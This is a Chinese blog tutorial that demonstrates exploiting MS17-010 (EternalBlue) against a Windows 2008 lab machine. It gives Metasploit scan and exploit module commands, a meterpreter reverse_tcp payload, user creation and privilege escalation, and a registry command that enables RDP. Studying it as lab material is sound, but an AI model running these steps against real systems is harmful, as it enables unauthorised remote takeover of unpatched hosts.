首页 > 其他分享 >MS17_010漏洞利用

MS17_010漏洞利用

时间:2022-11-05 01:11:09浏览次数:67  
标签:set ip 端口 192.168 010 漏洞 MS17

用到的试验机

kali ip 192.168.1.106

windows2008   ip   192.168.1.107

用kali扫描靶机端口

 

 

 这里看到445端口是开放的,可以利用17_010

使用命令msfconsole启动metasploit渗透测试平台

 

 使用命令search 17_010搜索漏洞的模块

 

 先利用命令 来调用漏洞扫描模块

use auxiliary/scanner/smb/smb_ms17_010 

设置目标ip或网段

set RHOSTS 192.168.1.107

 执行扫描:run

 

 出现这种状况,就说明这个靶机有这个漏洞的存在

我们调用攻击模块,使用命令

use exploit/windows/smb/ms17_010_eternalblue

 设置目标ip或网段

set RHOSTS 192.168.1.107

 show options查看设置参数

 

 

 设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

 执行攻击:run

 

 攻击成功!

拿到shell

输入chcp 65001可以解决乱码问题

 

 接下来就是通过shell对靶机进行控制

创建用户,

 

 创建成功并提权

 

 提权成功

在一开始的扫描并没有发现3389端口开启,所以使用命令开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

 

 

 3389端口开启

然后使用rdesktop远程桌面连接2008,使用提权的用户进入桌面

 

 使用hack用户登录

登录成功

 

 以上只是一个演示,17_010漏洞还是很危险的

 

标签:set,ip,端口,192.168,010,漏洞,MS17
From: https://www.cnblogs.com/xwsfw/p/16859549.html

相关文章

  • [oeasy]python0010_hello_world_unix_c历史迷因
    HelloWorld!回忆上次内容我们这次设置了断点设置断点的目的是更快地调试调试的目的是去除​​bug​​别害怕​​bug​​一步步地总能找到​​bug​​这就是程序员基本......
  • [oeasy]python0010_hello_world_unix_c历史迷因
    ​ HelloWorld!回忆上次内容我们这次设置了断点设置断点的目的是更快地调试调试的目的是去除​​bug​​别害怕​​bug​​一步步地总能找到​​bug​​......
  • Apache shiro 反序列化漏洞
    Apacheshiro简介ApacheShiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从......
  • 【THM】Exploit Vulnerabilities(利用漏洞)-学习
    本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/exploitingavulnerabilityv2通过学习相关知识点:了解一些利用漏洞的工具、技术和资源。介绍在本文中,我们将......
  • (数据分享)江苏降水量数据的获取途径及方法:2000年1月-2010年12月小时级数据
    本文章分享的是江苏2000年1月-2010年12月欧洲中心数据30km分辨率的降水数据,平台有欧洲气象中心数据、nasa数据的历史数据、预测数据。 数据简介:降水是指从天空降落到地......
  • 第六章-文件上传漏洞
    第一节文件上传_绕过JS验证1.1JS验证代码分析1.2Burpsuite剔除响应JS对于JS前端验证,直接删除掉JS代码之后就可以绕过JS验证。1.3浏览器审计工具剔除JS利用浏览......
  • 平均110万个漏洞被积压,企业漏洞管理状况堪忧
    在软件安全的世界中,企业在软件开发生命周期中都面临着漏洞带来的巨大挑战。开发人员每天都需要确保交付没有漏洞的代码,因此他们需要花费大量的时间来解决首要处理的漏洞问......
  • 第五章-CSRF漏洞
    第五章-CSRF漏洞第一节CSRF原理介绍1.1CSRF漏洞定义​ CSRF(Cross-siterequestforery,跨站请求伪造)也被称为OneClickAttack或者SessionRiding,通常缩写为CSRF或者XS......
  • Error: error:0308010C:digital envelope routines::unsupported
    原因:node.js版本问题,nodev17+版本中的OpenSSL3.0对允许算法和密钥大小增加了严格的限制。 解决办法:方法一(本人测试无效):Windows,命令行输入如下内容setNODE_OPTION......
  • 洛谷 P1447 [NOI2010] 能量采集
    题目描述https://www.luogu.com.cn/problem/P1447栋栋有一块长方形的地,他在地上种了一种能量植物,这种植物可以采集太阳光的能量。在这些植物采集能量后,栋栋再使用一个能......